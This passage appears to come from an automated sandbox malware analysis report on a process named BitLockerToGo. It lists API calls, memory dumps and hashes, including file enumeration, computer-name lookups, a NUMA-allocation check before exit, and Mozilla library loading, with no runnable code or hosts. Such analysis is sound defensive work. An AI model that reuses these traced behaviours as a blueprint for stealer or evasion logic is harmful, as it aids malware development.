                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                                                                                • String ID: ERROR$ERROR
                                                                                                                                                                • API String ID: 3287882509-2579291623
                                                                                                                                                                • Opcode ID: 38ee5a5abf653e7c2eac7ea7ee722b36f781dbe0c8907843f6adf126e35b7c08
                                                                                                                                                                • Instruction ID: 4b2dae367ac209414c0f22fa6f1ade34a78b5e47d0c1d5f61faa47a557371f6d
                                                                                                                                                                • Opcode Fuzzy Hash: 38ee5a5abf653e7c2eac7ea7ee722b36f781dbe0c8907843f6adf126e35b7c08
                                                                                                                                                                • Instruction Fuzzy Hash: 35115639A03248ABDB18FF70DD50AED7738AF90210F804554E81A4F591EF706B2AC790
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014F7A
                                                                                                                                                                • lstrcat.KERNEL32(?,03021070), ref: 03014F97
                                                                                                                                                                • lstrcat.KERNEL32(?,03554CF0), ref: 03014FAB
                                                                                                                                                                • lstrcat.KERNEL32(?,03021074), ref: 03014FBD
                                                                                                                                                                  • Part of subcall function 03014910: wsprintfA.USER32 ref: 0301492C
                                                                                                                                                                  • Part of subcall function 03014910: FindFirstFileA.KERNEL32(?,?), ref: 03014943
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FDC), ref: 03014971
                                                                                                                                                                  • Part of subcall function 03014910: StrCmpCA.SHLWAPI(?,03020FE0), ref: 03014987
                                                                                                                                                                  • Part of subcall function 03014910: FindNextFileA.KERNEL32(000000FF,?), ref: 03014B7D
                                                                                                                                                                  • Part of subcall function 03014910: FindClose.KERNEL32(000000FF), ref: 03014B92
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2667927680-0
                                                                                                                                                                • Opcode ID: 8bb213eceae75d61bcc7698cb2f1a10d4a47c8a5a661e1c3907d65f168495176
                                                                                                                                                                • Instruction ID: 6b5f6307fcc1518b816649aceb1327d83f1c43a73d3d80739067fa16fb363502
                                                                                                                                                                • Opcode Fuzzy Hash: 8bb213eceae75d61bcc7698cb2f1a10d4a47c8a5a661e1c3907d65f168495176
                                                                                                                                                                • Instruction Fuzzy Hash: 7021B87E941304ABD754F7A0FC49EDD373CA794700F008548B65A5A184EF7497C98B91
                                                                                                                                                                APIs
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554C00), ref: 0301079A
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554DA0), ref: 03010866
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554BF0), ref: 0301099D
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3722407311-0
                                                                                                                                                                • Opcode ID: f9082cfdbed2529b63094ac6bb495b4da7b17c9a0dd7be4a2ae9a520413d4587
                                                                                                                                                                • Instruction ID: aa6fb745ec7d429f7126ae1b421bd2d99c3bc8b87ca18a64430a66249e87cc06
                                                                                                                                                                • Opcode Fuzzy Hash: f9082cfdbed2529b63094ac6bb495b4da7b17c9a0dd7be4a2ae9a520413d4587
                                                                                                                                                                • Instruction Fuzzy Hash: 82916879B112089FDB28EF64D995AEE77B9FFD4300F408519D8099F281DB309A16CB91
                                                                                                                                                                APIs
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554C00), ref: 0301079A
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554DA0), ref: 03010866
                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,03554BF0), ref: 0301099D
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3722407311-0
                                                                                                                                                                • Opcode ID: 44073aa3e97505378175ded7249fb5f4155416f493f21e4b48c843c1df60b40b
                                                                                                                                                                • Instruction ID: a5921ec169be3d25a322911392467b119684151cf22913444c334f4e79c26027
                                                                                                                                                                • Opcode Fuzzy Hash: 44073aa3e97505378175ded7249fb5f4155416f493f21e4b48c843c1df60b40b
                                                                                                                                                                • Instruction Fuzzy Hash: E8817679B112089FCB18EF64D995AEEB7B6FFD4300F508519D8099F245DB30AB16CB81
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,03016A2B), ref: 03017910
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03017917
                                                                                                                                                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0301792F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1664310425-0
                                                                                                                                                                • Opcode ID: 784a74a341ab64cfe0fe320cbf0b3b4554d8f9617343160e6682d0fe3fee76f3
                                                                                                                                                                • Instruction ID: dc9a60619341943e14fd79834870d9ef222a7eecd0140238f9518dbf284593d1
                                                                                                                                                                • Opcode Fuzzy Hash: 784a74a341ab64cfe0fe320cbf0b3b4554d8f9617343160e6682d0fe3fee76f3
                                                                                                                                                                • Instruction Fuzzy Hash: 7101A4B1A45208EFD700DF98E949BAFBBFCFB04B21F10425AFA45E3280C37459048BA1
                                                                                                                                                                APIs
                                                                                                                                                                • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC73095
                                                                                                                                                                  • Part of subcall function 6CC735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCFF688,00001000), ref: 6CC735D5
                                                                                                                                                                  • Part of subcall function 6CC735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC735E0
                                                                                                                                                                  • Part of subcall function 6CC735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC735FD
                                                                                                                                                                  • Part of subcall function 6CC735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC7363F
                                                                                                                                                                  • Part of subcall function 6CC735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC7369F
                                                                                                                                                                  • Part of subcall function 6CC735A0: __aulldiv.LIBCMT ref: 6CC736E4
                                                                                                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7309F
                                                                                                                                                                  • Part of subcall function 6CC95B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC956EE,?,00000001), ref: 6CC95B85
                                                                                                                                                                  • Part of subcall function 6CC95B50: EnterCriticalSection.KERNEL32(6CCFF688,?,?,?,6CC956EE,?,00000001), ref: 6CC95B90
                                                                                                                                                                  • Part of subcall function 6CC95B50: LeaveCriticalSection.KERNEL32(6CCFF688,?,?,?,6CC956EE,?,00000001), ref: 6CC95BD8
                                                                                                                                                                  • Part of subcall function 6CC95B50: GetTickCount64.KERNEL32 ref: 6CC95BE4
                                                                                                                                                                • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC730BE
                                                                                                                                                                  • Part of subcall function 6CC730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC73127
                                                                                                                                                                  • Part of subcall function 6CC730F0: __aulldiv.LIBCMT ref: 6CC73140
                                                                                                                                                                  • Part of subcall function 6CCAAB2A: __onexit.LIBCMT ref: 6CCAAB30
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4291168024-0
                                                                                                                                                                • Opcode ID: 1142fdd2cce221b6a55510a890417efca5bb51063005d0168b9bb94b21e9e2fa
                                                                                                                                                                • Instruction ID: 8e0795a26bf67a99ea1b12da9257685c9c1b4ff47b7f0dd40ddf3175cac979c1
                                                                                                                                                                • Opcode Fuzzy Hash: 1142fdd2cce221b6a55510a890417efca5bb51063005d0168b9bb94b21e9e2fa
                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0F422E20B499ACA10DF74A8411EEB3B0EF6B214F505319E8A467661FF20A1D9C396
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 03019484
                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 030194A5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 030194AF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3183270410-0
                                                                                                                                                                • Opcode ID: 4fc58b8528ba46fa34305869a35ca3dbe3baaeedbb67c42330990d985e3d7b9c
                                                                                                                                                                • Instruction ID: a4fb889a383ce071cd376f06bed0114efff40c2afdf8008fcb2cad483e353c72
                                                                                                                                                                • Opcode Fuzzy Hash: 4fc58b8528ba46fa34305869a35ca3dbe3baaeedbb67c42330990d985e3d7b9c
                                                                                                                                                                • Instruction Fuzzy Hash: 67F0547994020CFBDB15EF94EC4DFED7778EB08710F008454BA095B180D7B45A85CB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,03016A1C), ref: 0300112B
                                                                                                                                                                • VirtualAllocExNuma.KERNEL32(00000000,?,?,03016A1C), ref: 03001132
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03001143
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1103761159-0
                                                                                                                                                                • Opcode ID: 802dfad3297e466209cd6a167a078182725109781702f2aadfdc66f8b16dc2b9
                                                                                                                                                                • Instruction ID: ecac5561627ec86e1c40491935c6ee6ccf9c7d731f742486db4842b189af5f5f
                                                                                                                                                                • Opcode Fuzzy Hash: 802dfad3297e466209cd6a167a078182725109781702f2aadfdc66f8b16dc2b9
                                                                                                                                                                • Instruction Fuzzy Hash: F5E0E678985308FBF754BBA5FD0EB4D76B8EF04B05F504054F7097A1C4D7B526009699
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 03017500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 03017542
                                                                                                                                                                  • Part of subcall function 03017500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0301757F
                                                                                                                                                                  • Part of subcall function 03017500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 03017603
                                                                                                                                                                  • Part of subcall function 03017500: RtlAllocateHeap.NTDLL(00000000), ref: 0301760A
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 03017690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 030176A4
                                                                                                                                                                  • Part of subcall function 03017690: RtlAllocateHeap.NTDLL(00000000), ref: 030176AB
